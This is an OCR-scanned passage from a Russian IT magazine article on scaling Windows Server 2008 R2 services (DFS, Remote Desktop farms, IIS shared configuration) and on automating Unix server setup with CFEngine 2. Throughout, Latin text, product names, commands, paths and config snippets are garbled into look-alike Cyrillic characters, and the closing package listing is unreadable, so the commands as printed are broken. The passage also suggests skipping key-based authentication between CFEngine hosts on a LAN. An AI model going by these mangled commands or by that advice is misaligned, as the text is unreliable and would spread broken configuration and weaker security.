который требует тщательного планирования. Чтобы уменьшить количество спор- 
ных вопросов, МісговоН выпустила ряд утилит. 

МісговоН А$$е$$теп1: апсі Ріаппіп§ Тооікй — инструмент широкого применения, 
позволяющий собрать данные (без установки агентов, используя ѴѴМІ) об уста- 
новленном оборудовании, системных настройках и установках безопасности, 
а затем выдать рекомендации по возможности использования ряда сервисов 
(Нурег-Ѵ, 8<2Ь и так далее). И хотя Асііѵе Бігесіогу в списке нет, общую картину ты 
все же получишь. 

Подобная утилита Асііѵе Бігесіюгу $ігег іооі, которая на основании введенной ад- 
мином информации (количество доменов, топология, наличие ЕхсЬап§е) помога- 
ет определиться с системными требованиями. К сожалению, Асііѵе Бігесііогу Зігег 
іооі ориентирован под домен на ѴѴіпгк, поэтому в современных ОС может помочь 
лишь при общем анализе ситуации. 

Утилита АБТезІі.ехе позволяет провести нагрузочное тестирование сервера Асііѵе 
Бігесіюгу и оценить потенциал имеющегося оборудования. 

При слиянии двух и более организаций придется либо настраивать доверитель- 
ные отношения между доменами, либо организовать один домен. В последнем 
случае будет полезен инструмент Асііѵе Бігесііогу Мі§гаііоп Тооі (АЛМТ), предна- 
значенный для переноса учетных записей пользователей и компьютеров, а также 
группы в другой домен. Мастер позволяет проверить параметры миграции перед 
переносом данных и убедиться в отсутствии конфликтов. 




Добавляем еще один объект для 
репликации 



Епитегагіоп, АВБЕ) — как раз и позволяет 
решить эту проблему. С АВБЕ пользователи 
видят только разрешенные файлы и каталоги. 
Суть в следующем: после включения в корне 
БЕЗ все ссылки будут иметь связанный де- 
скриптор безопасности, что дает возможность 
скрыть от пользователя те файлы, на которых 
у него нет прав. По умолчанию функция АББЕ 
для пространств имен отключена. Активиро- 
вать достаточно просто. Для этого использует- 
ся консольная утилита сКзиШ. Включаем: 

> сІЕзикіІ ргорегку АВБЕ \\зупаск.ги\ 

Ыатезрасеі 

Пространство имен \\зупаск.ги\ 

Батезрасеі : АВБЕ ВКЛЮЧЕНО 

Для примера установим разрешение на чтение 
списка файлов группе админов домена: 

> сНізиІііІ ргорегку асі дгапБ \\згѵ1\ 

Ыашезрасе1\сіосз "8УЫАСК\ 

Бошаіп Асішіпз " : В. РгоБесБ Керіасе 

Примечание: если сетевой ресурс находится 
на системе ниже ѴѴіп2к8/ѴІ5і:а, то указанные 
параметры не сработают. При попытке их 
использования получим ошибку. 

Также в консоли БЕЗ обращает на себя вни- 
мание новая вкладка Репликация. Дело в том, 
что в ѴѴіп2к8 для репликации папки ЗУЗѴОЬ 
вместо службы репликации файлов исполь- 
зуется БЕЗ. Настройки в указанной вкладке 
позволяют установить квоты, выбрать каталог 
для промежуточных файлов и определить 
действия при конфликтах. В случае если 
БЕЗ запущен на контроллере КОБС, БЕЗ для 
ЗУЗѴОЬ автоматически устанавливается в 
режим «только для чтения». 

В ѴѴіп2к8К2 появились новые функции, и 
возможности БЕЗ не ограничиваются лишь 
работой с сетевыми папками. Так в БЕЗ теперь 
можно настроить отказоустойчивые кластеры 
как часть группы репликации, причем класте- 
ры поддерживаются как в Зііапсіаіопе, так и в 
Ботаіп-Ьазесі БЕЗ. 

РУЛИМ ТЕРМИНАЛАМИ В большинстве 
повседневных задач обычному пользователю 
хватает компьютера с небольшой мощностью. 
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Установка служб ролей удаленных рабо- 
чихстолов 



и только некоторые приложения требуют более производи- 
тельных систем, но нужны они не часто. Выход из ситуации 
прост: установить один мощный комп, а пользователи 
будут подключаться к нему по протоколу КБР, используя 
службу терминалов. Такой подход, кроме прочего, позволя- 
ет сэкономить и на лицензиях. При увеличении количества 
компьютеров и объединении офисов возникнет необхо- 
димость пересмотреть существующие настройки, чтобы 
кТ5 (Тегтіпаі Зегѵісез) могли подключаться удаленные 
пользователи, а также распределить увеличившуюся на- 
грузку между имеющимися серверами. В ѴѴіп2к и ѴѴіп2кЗ 
поставленные вопросы решались танцами с бубном, но в 
ѴѴіп2к8 появились новые функции, которые практически 
полностью снимают все проблемы с настройкой доступа 
кТ5. Это технология КепкЛеАрр, позволяющая работать 
удаленно с отдельно выбранным приложением, веб-доступ 
к службам терминалов (Т5 ѴѴеЪ Ассезз) и шлюз служб тер- 
миналов (Т5 Сагеѵѵну) (подробно о настройке Т5 в ѴѴіп2к8 
читай в статье «Зона терминального доступа» в] [ 09.2008). 
В ѴѴіп2к8К2 к ним добавилась функция Ѵігшаі Безкюр 
ІпІгазІгисШге (ѴБІ), которая (для пользователя) практи- 
чески стирает грань между приложением, запущенным на 
локальной системе и в виртуальной среде. 

Также стоит отметить, что в К2 служба Тегтіпаі Зегѵісез 
стала называться иначе — служба удаленных рабочих 
столов (Кетоне Безктор Зегѵісез, КБ5), так что придется 
привыкать к новому названию. Теперь рассмотрим подроб- 
нее отдельные настройки. 

Службы КБ 5 являются одной из ролей сервера ѴѴіп2к8К2, 
достаточно отметить нужный флажок и затем установить 
необходимые службы ролей. Перечислять их все не буду, 
так как назначение понятно из описания, которое приво- 
дится здесь же. Причем, если планируется использование 
«Узла сеансов удаленных рабочих столов», то все прило- 
жения на сервере лучше установить после настройки этой 
роли. Если ранее работавшие приложения после разверты- 
вания КБ5 отказываются запускаться, просто переустано- 
ви их, это решит проблему. 

При выборе ѴБІ появится запрос на добавление Нурег-Ѵ, 
поэтому сервер должен отвечать всем требованиям, кото- 
рые предъявляются для установки этой системы виртуали- 
зации (подробнее о Нурег-Ѵ читай в статье «Гиперактивная 
виртуальность», опубликованной в ] [ 02.2009). 

В зависимости от выбранных служб ролей, в мастере будут 
появляться дополнительные шаги для предварительной 
настройки их работы. 

Если в сети используются компьютеры с ОС, которые под- 
держивают протокол СгебЗЗР (от Ѵізііа и выше), то нужно 




Консольуправления КОБ 



активировать проверку подлинности на уровне сети. Это 
увеличит безопасность, так как подлинность пользователя 
проверяется перед подключением к серверу, что позволит 
снизить ущерб от Бо5-атак и требует меньше системных 
ресурсов при подключении. Затем в консоли можно изме- 
нить эти и любые другие установки. На этапе «Настройка 
взаимодействия с пользователем» флажком указывается 
функциональность, которая будет доступна пользова- 
телям — воспроизведение аудио- и видеопотока, запись 
звука, Аего (конечно, если они не запрещены групповыми 
политиками) . 

Для работы шлюза КБ 5 необходимо создать политики 
авторизации подключений, это можно сделать при помо- 
щи мастера установки роли или затем в консоли. Про- 
цесс создания политик при помощи мастера достаточно 
прост. Указываем группы пользователей, которым будет 
разрешен доступ (это, естественно, должна быть отдельная 
группа), имя политики и метод проверки подлинности 
ѴѴіпсІоѵѵз (пароль и/или смарт-карта), и определяем, к 
каким компьютерам смогут подключаться пользователи в 
этой политике (определенные или любые) . Также в процес- 
се работы мастера необходимо установить службу защиты 
сетевого доступа ИАР (подробности смотри в статье «Сете- 
вой коп» из ] [ 12.2008) . 

После перезагрузки, которую необходимо произвести по 
окончании установки роли, будут выведены результаты 
установки и рекомендации по дополнительной настройке 
сервисов. 

Далее разберем настройку фермы хост-серверов КБ5. 
Основной компонент — посредник подключений к удален- 
ному рабочему столу (КБ Соппесгіоп Вгокег, в ѴѴіп2к8 — 
брокер сеансов служб терминалов), который и обеспечива- 
ет равномерное распределение нагрузки между серверами, 
с возможностью подключения к существующим сеансам 
(в ѴѴіп2кЗ для этого использовалась политика Зеззіоп 
Бігесюгу (каталог сеансов)) . 

Используя консоль «Управление компьютером», добавляем 
все хост-сервера в локальную группу «Компьютеры посред- 
ника сеансов» (Локальные пользователи и группы — Группы 
— Компьютеры посредника сеансов — Свойства — Доба- 
вить — Типы объектов — Компьютеры) . Открываем консоль 
«Конфигурация узла сеансов удаленных рабочих столов» 
(Администрирование — Службы удаленных рабочих сто- 
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поданнойтеме: 

• Установка конт- 
роллера домена на 
ѴѴіп2кЗ — «Первый 
шаг навстречу Асііѵе 
Оігесіогу», ][_04_2007. 

• Настройка КД 

в ѴѴіп2к8 — «Влаби- 
ринтеАЭ» р ][_1 1_2008. 

• Настройка Нурег-Ѵ 
— «Гиперактивная 
виртуальность», 
][_02_2009. 

• Настройка Тегтіпаі 
Зегѵісез в ѴѴіп2к8 — 
«Зона терминального 
доступа», ][_09_2008. 

• Настройка ЫАР — 
«Сетевой коп», 
][_12_2008. 

• Настройка І\ІІ_В 
вѴѴіп2кЗ — «Непотоп- 
ляемый сервер», 
][_02_2008. 

• Настройка Раііоѵег 
Сіизіег в ѴѴіп2к8 — 
«Безотказный файло- 
обменник», 
][_Ю_2008. 



ХАКЕР 04 /135/ 10 



► 113 






5ѴМ/АСК 



|йл ДіЛіЫи ЬпЛ &фМ«* 



**1Егп1 0(гв 




: 1 

, Щ~ І » : |И Р в Ои «>»■ 



Подключаем узел кферме 




Н і 0 '** Г^Г \&\\* Р ^ Ф аім ■ 

Настройка общей конфигурации N5 



лов), находим раздел «Член фермы в посреднике подключе- 
ний к удаленному рабочему столу», вызываем окно свойств, 
переходим в «Посредник подключений к удаленному рабоче- 
му столу». Параметры здесь неактивны, чтобы настроить их, 
нажимаем «Изменить» и в появившемся окне устанавливаем 
переключатель в «Член фермы». В открывшихся полях внизу 
страницы заполняем имя сервера посредника и имя фермы. 
После проведенных операций становится доступным пара- 
метр «Участвовать в балансировке нагрузки посредника под- 
ключений». При помощи цифр указывается относительный 
вес сервера. По умолчанию установлено значение 100, если 
другому серверу присвоить 50, то он будет принимать вдвое 
меньше нагрузки, чем первый. В поле «Выберите ІР-адреса, 
используемые для повторного подключения» устанавливаем 
флажки для всех ІР-адресов, которые необходимо использо- 
вать. Вот, собственно, и все. Кстати, эти настройки можно 
произвести при помощи групповых политик: Конфигурация 
компьютера — Политики — Административные шаблоны — 



.гфЬ|і , 

П НТТР://ѴѴѴѴѴѴ | 

1Г 

> Ііпкз 

Ресурс М іеговой, пос- 
вященный ѴѴіп2к8Р2 

— ѵѵѵѵѵѵ.тісгозой.сопп/ 

ѵѵіпс1оѵѵ55егл/ег2008/ 

т/т. 



Компоненты ѴѴіпбоѵѵз — Службы удаленных рабочих столов 
— Хост-сервер сеансов удаленных рабочих столов — Посред- 
ник подключений к удаленному рабочему столу. После всех 
этих манипуляций с возросшей нагрузкой будут справляться 
два менее производительных сервера. 

МАСШТАБ И РО ВАН И Е 1 15 Если веб-сервер перестает справ- 
ляться с нагрузкой, и под рукой есть маломощные сервера, 
то прежде чем бросаться покупать новое оборудование, 
можно настроить веб-ферму и равномерно распределить 
входящие подключения между узлами кластера. Используя 
два сервера, мы не только поднимаем производительность, 
но и увеличиваем отказоустойчивость. В ѴѴіп2к8/К2 
используется новая версия 115 7.x, являющаяся совершенно 
новым решением, по сравнению с предыдущими версиями 
этого веб-сервера. Главные новшества 115 седьмой версии 
— модульная архитектура, использование новых конфигу- 
рационных файлов и новые инструменты управления. Всего 
доступно около 40 служб ролей 115, которые разбиты на 8 
групп, но администратор устанавливает лишь действи- 
тельно необходимые функции. Конфигурационные файлы 
выполнены в ХМЬ-формате (размещаются в %5у5Штгооі:%\ 
штбот\5у51ет32\те15ГУ\сопй§) и достаточно просто 
переносятся между машинами (здесь 115 стал напоминать 
АрасЬе), поэтому клонировать настройки веб-сервера мож- 
но простым копированием файлов (например при помощи 
хсору) . В предыдущих версиях это было на порядок сложнее. 
Данная особенность используется в механизме Общая 
конфигурация (ЗЬагесі Сопй^игагіоп), когда один конфигу- 
рационный файл (АррНози.сопй^), размещенный на ШГС 
ресурсе, используют несколько веб-серверов, что помогает 
в создании веб-ферм. Для начала создаем общую сетевую 
папку и отдельную учетную запись пользователя, который 
будет владельцем этой папки (устанавливаем нужные права 
для ]\ГГР5 и сетевого доступа) . Затем в диспетчере служб ИЗ 
выбираем узел и в поле Управление щелкаем пункт «Общая 
конфигурация». При помощи ссылки с несколько стран- 
ным названием «Выполняется экспорт конфигурации», 
размещенной в поле Действия, экспортируем настройки, 
указав сетевой путь и учетные данные для доступа. Чтобы 
защитить данные от чтения посторонними, вводим ключ 
шифрования. Теперь ставим флажок «Включить общую кон- 
фигурацию», вводим логин и пароль для доступа к ресурсу и 
в появившемся окне ключ для расшифровки. Теперь веб-сер- 
вер будет брать настройки с указанного сетевого ресурса. На 
остальных серверах выполняем аналогичные действия (без 
экспорта настроек, так как они уже есть) , копируем контент 
и получаем несколько абсолютно одинаковых сайтов. 
Настройки теперь можно производить только в одной из 
консолей диспетчера служб ИЗ, все изменения автомати- 
чески будут подхвачены другими серверами. Задействовав 
возможности БЕЗ и указав в качестве места расположения 
файлов (конфигурационных и статического контента) сете- 
вой ресурс, мы получаем самонастраивающуюся отказоус- 
тойчивую веб-систему. Останется только настроить службу 
НеЦлгогкЬоасІ Ва1апсіп§ (N13) для распределения сетевой 
нагрузки между веб-серверами. 

ЗАКЛЮЧЕНИЕ Каквидишь, многие проблемы, возника- 
ющие при увеличении нагрузки, можно решить, просто 
перераспределив ресурсы или изменив стандартную схему. 
Конечно, не всегда это удается, иногда все же приходится 
докупать оборудование. Здесь важно проанализировать 
ситуацию и правильно оценить конечный результат, □с 
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АВТОМАТИЗИРУЕМ НАСТРОЙКУ СЕРВЕРОВ С ПОМОЩЬЮ СРЕИбІЫЕ 2 

Администрируя сеть из множества машин, выполняющих однотипные 
функции,™ рано или поздно начнешьзадумываться об автоматизации 
процесса их конфигурирования и управления ими. Программы вроде 
сіззіі и гзупс в этом случае помогуттолько отчасти, вынуждая выполнять 
львиную долю работы вручную. Однако существует инструмент, способ- 
ный автоматизировать большую часть функций администрирования и 
превратитьсетьсерверов в интеллектуальную самонастраиваемую инф- 
раструктуру. 



СРЕМ6ІЫЕ (СОЫРіеиРАТІОЫ бисшеі — ОДИН 
из старейших и наиболее мощных инстру- 
ментов администратора, который позволяет 
управлять сетью машин в автоматическом 
режиме с минимумом ручной работы. С помо- 
щью правил СРЕпдіпе администратор может 
описать состояние, в котором должна нахо- 
диться та или иная машина или сеть машин в 
определенное время или при определенных 
обстоятельствах. Отклонение от этого состоя- 
ния повлечет за собой принятие корректиру- 
ющих мер.СРЕп§іпе позволяет контролировать 
многие аспекты состояния системы, включая 
редактирование файлов, запуск/останов серви- 
сов, установку/удаление приложений, настрой- 
ки сети и многое, многое другое. При должном 
уровне терпения и знаний особенностей работы 
контролируемых машин, ты вполне сможешь 
создать интеллектуальную сеть, где сбой какой- 
либо машины или появление аномалий будут 
автоматически исправлены без необходимости 
вмешательства со стороны человека. 

УСТАНОВКАНе так давно разработчики 
СРЕпдіпе объявили о выходе третьей версии 
своего ПО, которое включает множество до- 
полнений, расширяющих функциональность 
и повышающих гибкость системы. Однако 
официальное англоязычное руководство и 
огромное множество другой документации, 
которую ты сможешь найти в Сети, до сих пор 
ссылается на версию номер два. Более того, во 
многих дистрибутивах третья версия вообще 
недоступна в репозиториях, поэтому мы не 



будем рассматривать ее в рамках статьи, а 
остановимся на стабильном и проверенном 
временем СРЕпдіпе 2. 

Итак, вторая версия СРЕпдіпе доступна почти 
во всех ІШІХ-подобных ОС и Ілпих-дистрибу- 
тивах, поэтому получить и установить его не 
составит труда. Например, для установки в 
ПеЪіап/ЦЪипш достаточно выполнить всего 
одну команду: 

$ зибо арР-деР іпзРаІІ сРепдіпе2 

Пакет СРЕпдіпе состоит из трех ключевых 
компонентов: 

• Сервер (сбзегѵсі) 

• Клиент (сба^епО 

• Планировщик (сбехесб) 

Сервер сбзегѵсі — центральная часть комплек- 
са, принимает запросы клиентов и отдает им 
файлы, содержащие инструкции по измене- 
нию конфигурации машин. 

Клиент сіа^епі:, называемый в словаре 
СРЕп^іпе-агентом, устанавливается на все уп- 
равляемые машины. Его задача — подключе- 
ние к серверу, получение конфигурационных 
файлов и исполнение содержащихся в них инс- 
трукций (модификация системных файлов, 
установка ПО, запуск серверов и т. д.) . 
Планировщик сбехесб ответственен за запуск 
агента на машине-клиенте. Его задача — 
запуск агента через определенные интервалы 
времени с возможным перенаправлением 
стандартных ввода/вывода и отсылка диа- 
гностических сообщений администратору. 



Кроме описанных выше компонент, СРЕпдіпе 
устанавливает в систему набор подсобных 
утилит, необходимых для выполнения специ- 
фических задач. Одна из них — сбшп, которая 
может быть использована для запроса экс- 
тренного подключения удаленных агентов к 
серверу (можно использовать для отладки) . 
Утилита сбкеу предназначена для создания 
пар "публичный/приватный ключ", ис- 
пользуемых для взаимной аутентификации 
сервера и агентов. Демон сбепѵсі осуществля- 
ет мониторинг работоспособности систе- 
мы, отслеживая информацию о процессах, 
сетевых соединениях, общей загруженности, 
свободной памяти и т.д. В дальнейшем эту 
информацию может использовать сіа^епі: для 
обнаружения аномалий и принятия мер по 
устранению проблем, а утилита сіепѵ^гарЬ. 
способна визуализировать эту информацию 
в виде графа. С&Ьоѵѵ позволяет исследовать 
текущее состояние СРЕпдіпе с помощью 
интерфейса командной строки. 

После установки пакет создает собственный 
подкаталог в каталоге ѵаг (/ѵаг/НЬ/сГеп§іпе2), 
который содержит все компоненты системы: 

Каталоговая структура СРЕпдіпе 2 

Ьіп — бинарные файлы, ссылка на /изг/ 
зЬіп 

іприРз — конфигурационные файлы, 
ссылка на /еРс/сРепдіпе2 
шобиіез — сторонние расширения 
рркеуз — публичные и приватные ключи 
зРаРе — текущее состояние СРЕпдіпе 
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ПРАВИЛА Управление поведением агента СРЕп^іпе производится с 
помощью правил, описанных в конфигурационных файлах. Модифи- 
цируя их, администратор может изменять многие аспекты состояния 
системы, включая: 

• Проверка и изменение прав доступа и владельцев файлов. 

• Редактирование файлов. 

• Компрессия, удаление и другие манипуляции с файлами. 

• Удаленный запуск команд. 

• Перезапуск упавших демонов. 

• Установка ПО, включая обновления безопасности. 

• Конфигурирование сетевых интерфейсов и таблиц маршрутизации. 
Конфигурационные файлы представляют собой своего рода скрипт на 
языке высокого уровня, читая который, агент получает информацию 
о том, какие действия ему необходимо выполнить для конфигурации 
целевой машины. Ключевая особенность этого скрипта заключается 
в том, что он ориентирован на получение одинаковых результатов 

на всех конфигурируемых машинах без необходимости составления 
отдельного скрипта для каждой из них. Чтобы добиться этого, язык 
конфигурационного файла требует задать набор действий, которые 
приведут целевую систему к желаемому состоянию. Все это похоже 
на управление группой администраторов-эникейщиков, за каждым 
из которых закреплена определенная машина. Вместо того, чтобы 
давать задание по установке и настройке арасЬе каждому из них по 
отдельности, ты собираешь их всех и говоришь, что на подчиненных 
машинах необходимо выполнить команду «арі-§еі: іпзтаіі арасйе2», а 
затем изменить определенные строки файла Ьшрб.сопЕ Таким образом 
можно получить идентичные настройки индейца на всех машинах без 
лишней головной боли. Конфигурационные файлы СРЕп^іпе разделе- 
ны на блоки, каждый из которых включает действие, условие и объяв- 
ление. Описание этих блоков имеют следующую форму: 



Форматописания блоков конфигурационного файла 

действие : 

сіаззі:: # ' сіаззі' — условие 

объявление 
объявление 

с1азз2 | сІаззЗ : : # ' с1азз2 I СІаззЗ ' — условие 

объявление 

Первая строка задает тип действия, который необходимо выполнить. 
СРЕп§іпе второй версии поддерживает более 20 различных типов 
действий, среди которых есть тип Шез, который позволяет проверять 
и исправлять права и владельцев файлов, есІкШез для редактирования 
файлов, раска§ез для установки пакетов и другие. Условие, как можно 
догадаться из названия, задает условие, при котором действие будет вы- 
полнено. Это может быть время на системных часах, тип операционной 
системы или что-то другое. Чтобы действие было выполнено в любом слу- 
чае, условие можно опустить. Объявление представляет собой описание 
того, что необходимо проделать в рамках заданного действия. Для раз- 
личных типов действий форма их описания будет отличаться, поэтому 
при задании неиспользуемых ранее действий тебе придется обращаться 
к документации. Кроме "обычных" действий, СРЕп§іпе позволяет зада- 
вать также мета-действия, которые предназначены не для модификации 
состояния системы, а для выполнения различных вспомогательных 
функций. Наиболее важным мета-действием является сошгоі, которое 
позволяет конфигурировать агента, скажем, задать список действий и их 
очередность в переменной ас^:іоп5е^иепсе. Приведу пример: 

$ зисіо ѵі /Ітр/затріе.соггі 

сопбгоі : 

асбіопзедиепсе = ( Шез ) 
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іііез : 

/ебс/зкаскж ошіег=гооѣ 
дгоир^зйаскж тос1е=0 640 
асЬіоп=^іха11 

С помощью этих правил мы указали агенту, 
что: 

1 Он должен выполнить действие Шез (первый 
блок) . 

2 В рамках действия Шез он должен проверить 
права доступа и владельца файла /епс/зііасіоѵѵ 
и исправить их, если они не совпадают с ука- 
занными (0640, гоон, зйасіоѵѵ) . 

Для проверки работоспособности правил 
сохрани их в файл (например, Лтр/затріе. 
сопГ) и выполни следующую команду: 

$ зисіо сііадепк -I /бтр/затріе . сопі: 

Кроме прав доступа и владельца, в рамках 
правила Шез агент может выполнить проверку 
МЭ5-суммы файла, что можно использовать 
в качестве альтернативы системам контроля 
целостности системы (вроде ітірѵѵіге) . 

Списокдействий 
в порядке приоритета 

тоипбаіі — монтирование файловых 
систем, перечисленных в іізкаЪ 
тоипбіпііо — получение информации о 
смонтированных файловых системах 
сЬесккітегопе — проверка и установка 
временной зоны 

пебсопіід — сетевые настройки 
гезоіѵе — настройка файла /ебс/ 
гезоіѵ. сопі 

ипшоипР — размонтирование файловых 
систем 

раскадез — установка/обновление/ 
удаление пакетов 
зЬеІІсошшапсіз — запуск команд 
ебіббііез — редактирование файлов 
аббтоипбз — монтирование ранее неис- 
пользуемых файловых систем 
бігесбогіез — создание каталогов 
Ііпкз — проверка и управление ссыл- 
ками 

таіісйеск — проверка на существова- 
ние каталога спулинга 
гедиігесі — проверка файловых систем 
на доступность 

бібу — поиск и удаление устаревших 
файлов 

бізаЫе — переименование файлов 
бііез — проверка прав доступа и вла- 
дельцев файлов 
сору — копирование файлов 
ргосеззез — управление процессами 
шоби1е:пате — запуск определенного 
пользователем модуля 

Администрируя сеть из машин с различными 
операционными системами, ты столкнешься 
с проблемой отличий имен/прав /владельцев 
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# Настройки 
согтЬгоІ: 

# Список действий 

асііопзедиепсе = ( гезоіѵе ■рііез Іісіу ргосеззез } 

# Домен 

сіошаіп = ( хакер. ги ) 

# Временная зона (Москва) 

Тітегопе = ( М5К ) 

# 5МТР- сервер к е-таіі админа (для отправки отчетов об ошибках) 
згпТрзегѵег = ( зтір . хакер Р ги ) 

зузасЗт = ( асітіпфхакер* ги ) 

# Модификация гезоіѵ, сопТ 
гезоіѵе: 

192*168 .1.1 
192.168.1*2 

# Проверка и установка прав доступа на системные файлы 
Іііез : 

/еіс/зисіоегз пюсіе=440 сипег-гооі дгоир=гоо1 асііоп-^іхаіі 



|/еТс/с1 : епдіпе2/с1 : адепТ . соітГ [+] 32 0x20 [11, 1 ] [33%] 



Создаем файл правил 



системных файлов. Ведь если в Ііпих файл тене- 
вых паролей носит имя /еіс/зЬасІоѵѵ, а его вла- 
дельцем является гооизЬасІоѵѵ, то, например, 
во ЕгееВЗБ ты получишь совсем иную картину: 
файл /еіс/тазіег.раззѵѵеі и владелец гооі:ѵ\4іее1. 
Как быть в этом случае? Именно для этого и 
нужны условия (классы). Следующий набор 
правил одинаково хорошо отработает как на 
Ііпих-машинах, так и на машинах с ЕгееВЗБ: 

$ зисіо ѵі Лтр/затріе. сопі 

сопбгоі : 

асбіопзедиепсе = ( бііез ) 
бііез : 

Ііпих: : 

/ебс/зкасіом оѵтег=гооб 
дгоир=зЬабохѵ тобе=0440 асбіоп=ііха11 
бгееЪзб: : 

/ебс/тазбег . раззжі оѵтег=гооб 
дгоир=Шіее1 тос1е=0440 асбіоп=:Еіха11 

В зависимости от используемой операционной 
системы, времени суток, нагрузки на систему, 
клиент СЕЕп^іпе определяет множество 
классов, которые можно использовать для уп- 
равления тем, какое действие будет выполнено 
в определенной ситуации. Ты можешь легко 
проверить, какие классы определены на маши- 
не, с помощью запуска следующей команды: 

$ зибо сбадепб -рѵ 

Наиболее используемыми являются классы, оп- 
ределяющие операционную систему. СЕЕп^іпе 
позволяет определить тип операционки вплоть 
до версии ядра и библиотеки НЪс, что может 
оказаться важным для обхода возможных про- 
блем, связанных с этими компонентами. Также 
популярны классы, определяющие текущее 
время (например, Нг00 — полночь, Нг12 — 
полдень и т.д.), они могут быть использованы 
для выполнения действий по расписанию. 



СРЕп§іпе позволяет делать выбор между класса- 
ми на основе логического "ИЛИ" или "И". Так, на- 
пример, действие с условием ІгееЪзсІ | орепЪзс! бу- 
дет выполнено как на машине с ОС РгееВЗИ, так 
и на ОрепВЗЭ. Однако условие НгОО.ОрепВЗИ 
будет выполнено только на опенке в полночь. 
Классы можно отрицать, указав перед ними знак 
восклицания. Это значит, что действие будет 
выполняться, пока класс не будет определен. 
Особую роль условия играют внутри действия 
сошгоі, позволяяустанавливать переменные в 
зависимости от параметров машины: 

$ зисіо ѵі Лтр/затріе. сопі 

сопбгоі 

орепЬзб: : 

сгопбіг = ( /ѵаг/сгоп/баЪз ) 
Ііпих: : 

сгопбіг = ( /ѵаг/зрооі/сгоп ) 
зоіагіз : : 

сгопбіг = ( /ѵаг/зрооі/сгоп/ 
сгопбаЪз ) 

СЕЕп^іпе позволяет создавать пользова- 
тельские классы, которые определяются в 
момент выполнения определенного условия. 
Например: 

$ зисіо ѵі Лтр/затріе. сопі 

сопбгоі : 

асбіопзедиепсе = ( ебіббііез ) 
сіаззез : 

1іпих_зуз = ( ІзБіг(/зуз) ) 

зкеіісошшапб: 

1іпих_зуз : : 

"есію Каталог /зуз существует" 

Мета-действие сіаззез создает класс Нпих_зуз, 
который будет определен только в том случае, 
если каталог /зуз существует. В данном случае 
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Настройка 

аутентификации 

Если ты решишь использовать СРЕп^іпе для конфигурирования геогра- 
фически распределенных узлов, то тебе не обойтись без настройки ау- 
тентификации. Для этого запусти команду сШеу на сервере и клиентах. 
Это приведет к созданию двух ключей в каталоге /ѵаг /1іЪ/с1еп§іпе2/ 
рркеу$: ІосаШозІ.риЪ (публичный ключ) и ІосаШозІ.ргіѵ (приватный 
ключ). 

После этого публичный ключ сервера необходимо скопировать на 
каждую машину-клиента под именем /ѵаг /ІіЪ /сіеп&іпег /рркеу 5 /ІР-сер- 
вера.риЪ. Публичные ключи клиентов также придется скопировать на 
сервер под именем /ѵаг/ІіЪ/сІеп&іпег/рркеуз/гооІ-ІР-клиента.риЪ. 

» зисіо 1з -1 /ѵаг/ІіЬ/сТепдіпеЗ/рркеуз/ 

ЮТаІ 8 



-ГѴ-- 1 гоо± гооТ 1743 2010 - 01-21 14:03 ІосаІИоБІ: . ргіѵ 

- пѵ 1 гооі: гооі 426 2010 - 01-21 14:03 ІосаІЬозІ: . риЬ 



»п 

Результат выполнения команды сікеу 

ІзБіг — это условие, при выполнении которого будет 
определен класс. В арсенале СЕЕп^іпе имеется солидный 
багаж самых разнообразных условных выражений, среди 
которых: 



Некоторые популярные условные выражения 
действия сіаззез 

ІзЫемегТЪ.ап ( 11 , 12 ) — истина, если файл 11 был 
модифицирован позже файла 12 
РіІеЕхізІз ( 1) — истина, файл 1 существует 
ІРКапде (диапазон) — ІР-адрес машины соответс- 
твует диапазону ІР-адресов 

ІзБеІіпесІ (переменная) — переменная определена 
ІзБіг(І) — файл 1 является каталогом 
ІзЬіпк(І) — файл 1 — ссылка 
ІзРІаіп(І) — файл 1 — обычный файл 
Кедстр(ге, строка) — строка соответствует ре- 
гулярному выражению ге 
Зігстр ( зі , з2 ) — строки совпадают 

ИСПОЛЬЗОВАНИЕ Чтобы начать использовать СЕЕп^іпе, 
тебе понадобятся: 

1 Сервер с установленным СРЕп^іпе. 

2 Клиенты, на каждом из которых установлен агент 
СРЕп^іпе. 

3 Набор грамотно составленных правил. 

Первые два пункта легко выполнить, следуя инструкциям, 
приведенным в разделе "Установка". Для составления пра- 
вил ты можешь использовать приведенные ниже примеры, 
дополненные в соответствии с твоими требованиями. 
Важным шагом является настройка доверительной сис- 
темы, которая включает в себя взаимный обмен публич- 
ными ключами между сервером и клиентами. Однако 
в большинстве случаев этот шаг излишен, потому как 
применение СРЕп^іпе для управления серверами глобаль- 
ной сети — явление редкое, а во внутренней локальной 
сети можно обойтись и без аутентификации узлов. Мы 
сделаем так, чтобы все машины локальной сети изначаль- 
но доверяли друг другу и не требовали аутентификации с 
использованием ключей. 




НТТР://ѴѴѴШ 
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> Ііпкз 

• ѵѵѵѵѵѵ.ітеезоигсе. 
ги/бокитепіасіѵа/ 
с|ещте — Перевод 
документации к 
СРЕпдіпе2 

• ѵѵѵѵѵѵ.сіепдіпе. 
огд/тапиаіз/с^- 
Реіегепсе.ЫтІ 
— Справочник по 
СРепдіпе2 




Вызов агента по 
расписанию можно 
настроить и без ис- 
пользования сгоп. Для 
этого в правило сопітоі 
файла сіедепРсопі 1 
достаточно добавить 
строку: 

ЗсЬесІиІе = ( Міп30_35 ] 



на іпм те г : ИЪилТи ВеѵеЬрв г? ^і*щпгу . сі іэ сияацЛ тг 9 . иЬилг ц . со** 

Огіділаі ' Ндіпіэтсіг; Ангогній Вагіісі . о 

А гсіі и ге : ІЗВ6 

Ѵегвівп: 2.2. ІЙ-1 
Аеріэгея: с^ег>аіпе2-(Іос 

Оервпсія: ІіЬсб (>- 2.7Ц ІіЫІЬД.?. ХіЬяяіО.Э . 6 [>- &.Э.87-5Ц гіеЬсеп* (>- 0.5 

) | еіеЬеоп^-г.О 

СапНісгя: 

Рі\еп«і»9 : рмѴи0іѵ«іче/е/с?епдііэд2/с1епділеа_2,2. 10- ДеЬ 

5І24! 2766 ІЯ 

НОБяич і И74*4*Е4сЪЭ^а5(1М 1 2ѢвЫ 2 Т 1* 

2НА1 ! еаЗа1=Ьег(179с8Э5995б39П2ее9ЬЬ[1Ь0о&93еЗОс 

5НА : 1 еЭ 1=а8«9 ЙЭ а7 еЭл бе 4 1аЗЬ7а18Ь524е гіЬЬ57 соЙЬБа2007 гѲ7&Зс еЗйЭЬа’Г* 14? 
Оеасгіргіоп : Тдоі Таг едп+ідигігід апі яаілгаіп і.пд пеінагк рвеіііпея 
ТНе авіп руграяа а# а^епдіпа іа га аТДаѵ гкіа ауягег* агівіпізг гага г 
га апевга « аіпді* смиі\ Ш4 чЪгсіі иіИ сМійя Ьан- аѵегу »ш9і 
